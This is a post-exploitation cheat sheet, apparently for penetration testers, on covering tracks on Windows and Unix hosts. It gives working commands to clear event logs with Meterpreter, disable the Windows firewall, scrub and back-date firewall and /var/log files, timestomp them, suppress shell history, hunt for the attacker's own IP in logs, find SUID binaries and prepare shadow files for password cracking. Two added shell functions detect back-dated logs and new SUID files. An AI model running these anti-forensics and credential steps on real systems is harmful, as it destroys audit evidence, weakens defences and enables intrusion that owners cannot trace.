Post Exploitation

Covering Tracks

  • Potential Windows logged locations
    • Windows Event Logs
      • System
      • Application
      • Security
    • Application Logs
      • Such as SQL error or IIS Server logs if you exploited a specific application
    • Windows Firewall Logs
    • WMI Trace Logs
    • Prefetch
    • Microsoft Error Debugger Mechanism
      • Can create a memory dump when a program crashes
      • XP: Dr. Watson
      • Vista+: Windows Error Reporting
  • Potential *Nix logged locations
    • /var/log
    • .bash_history
      • Normally not written to disk until the shell exits
    • utmp, wtmp, btmp
      • Binary, cannot be edited without custom tools
    • Core debugging
      • Run "ulimit -c" to determine if it's enabled (0 means core dumps are disabled)
      • /core

Windows

Meterpreter

run event_manager -l <log> -f <event ID>
run event_manager -c <log>
run event_manager -i

Clean firewall log

run multicommand -cl "findstr \"<string>\" c:\\windows\\system32\\logfiles\\firewall\\pfirewall.log"
run multicommand -cl "cmd /c findstr /V \"<string>\" c:\\windows\\system32\\logfiles\\firewall\\pfirewall.log > c:\\windows\\temp\\log.tmp"
ps -U <user> (Look for logon.scr to indicate the screensaver is running)
run multicommand -cl "netsh firewall set opmode disable"
run multicommand -cl "cmd /c type c:\\windows\\temp\\log.tmp | find /c /v \"\"" (Get line count)
run multicommand -cl "cmd /c more +<above result - 1> c:\\windows\\temp\\log.tmp" (Get last entry; more takes +n before the file name)
run multicommand -cl "cmd /c move /Y c:\\windows\\temp\\log.tmp c:\\windows\\system32\\logfiles\\firewall\\pfirewall.log"
timestomp -m "MM/DD/YYYY HH:MM:SS" c:\\windows\\system32\\logfiles\\firewall\\pfirewall.log
run multicommand -cl "netsh firewall set opmode enable"

Find crash dumps

run multicommand -cl "cmd /c dir c:\\*.*dmp /S /A"

List directory contents, oldest to newest write time

run multicommand -cl "cmd /c dir /A /od /tw"

Get logs from last 30 minutes

run multicommand -cl "cmd /c psloglist.exe -m 30 <logname> /accepteula"

*Nix

Find logs modified in the last 30 minutes

find /var/log -type f -mmin -30 2> /dev/null

Prevent shell history

unset HISTFILE

Clean plain text logs

grep -v "<string>" /var/log/<file> > /tmp/log.clean
cp /tmp/log.clean /var/log/<file> (Copying preserves permissions!)
touch -t YYYYMMDDHHMM.SS <file>
rm -rf /tmp/log.clean
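Defender's side of the clean-up above, as an added example that is not part of the original cheat sheet: "touch -t" can set a file's atime and mtime, but only the kernel sets ctime, so a log whose ctime is far ahead of its mtime has been modified or had its metadata changed after the time it claims. The function below walks a directory and reports that gap; it assumes GNU coreutils stat (Linux) and a threshold in seconds (one hour by default). The directory name, function name and threshold are this example's own choices.

```shell
# check_touch_anomalies DIR [THRESHOLD]
# Prints "<ctime minus mtime in seconds> <path>" for every regular file under DIR
# whose ctime is more than THRESHOLD seconds newer than its mtime.
# Assumes GNU stat (-c '%Y %Z'); example code, not from the original page.
check_touch_anomalies() {
    dir="$1"
    threshold="${2:-3600}"
    find "$dir" -type f 2>/dev/null | while IFS= read -r f; do
        # %Y = mtime, %Z = ctime, both as seconds since the epoch
        set -- $(stat -c '%Y %Z' "$f" 2>/dev/null)
        [ "$#" -eq 2 ] || continue
        gap=$(( $2 - $1 ))
        if [ "$gap" -gt "$threshold" ]; then
            printf '%s %s\n' "$gap" "$f"
        fi
    done
}

# Usage: sh check_logs.sh /var/log [threshold-seconds]
[ "$#" -ge 1 ] && check_touch_anomalies "$1" "${2:-3600}"
```

A back-dated log shows a gap of months or years; expect some noise from log rotation, which renames and chmods files (bumping ctime) without rewriting their contents.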

Find all logs with your IP

find /var/log -type f -exec grep '<ip>' /dev/null {} + 2>/dev/null (/dev/null forces grep to prefix each match with the file name)

View cron jobs

for i in $(find /etc/cron* -type f 2>/dev/null); do echo; echo "==========$i=========="; ls -l "$i"; cat -n "$i" 2>&1; done

Files & File System

Find all SUID files

find / -perm -4000 2>/dev/null (matches anything with the setuid bit set, add -type f to skip directories)
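The same find, turned into a baseline check a defender can run from cron (added example, not part of the original cheat sheet): record the SUID inventory once, then report any setuid binary that was not in the baseline. It assumes POSIX find, sort and comm; the function names and the baseline file path are this example's own.

```shell
# list_suid ROOT: sorted list of regular files under ROOT with the setuid bit set.
# -type f skips setuid directories, -xdev keeps the walk on one filesystem
# (no /proc, no network mounts). Example code, not from the original page.
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | LC_ALL=C sort
}

# save_suid_baseline ROOT FILE: record the current inventory for later comparison.
save_suid_baseline() {
    list_suid "$1" > "$2"
}

# new_suid ROOT FILE: print SUID files present now but absent from baseline FILE.
# Returns 0 when nothing is new, 1 when at least one new file was printed.
new_suid() {
    added=$(list_suid "$1" | LC_ALL=C comm -13 "$2" -)
    [ -z "$added" ] && return 0
    printf '%s\n' "$added"
    return 1
}

# Usage: sh suid_check.sh / /var/lib/suid.baseline
# First run writes the baseline; later runs report additions (hypothetical path).
if [ "$#" -eq 2 ]; then
    if [ -f "$2" ]; then new_suid "$1" "$2"; else save_suid_baseline "$1" "$2"; fi
fi
```

Keep the baseline somewhere the audited host cannot rewrite it, and refresh it after package upgrades so legitimate new setuid binaries do not keep firing.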

Password Cracking

John

unshadow passwd shadow > unshadowed.txt

Backup files

/etc/passwd-
/etc/shadow-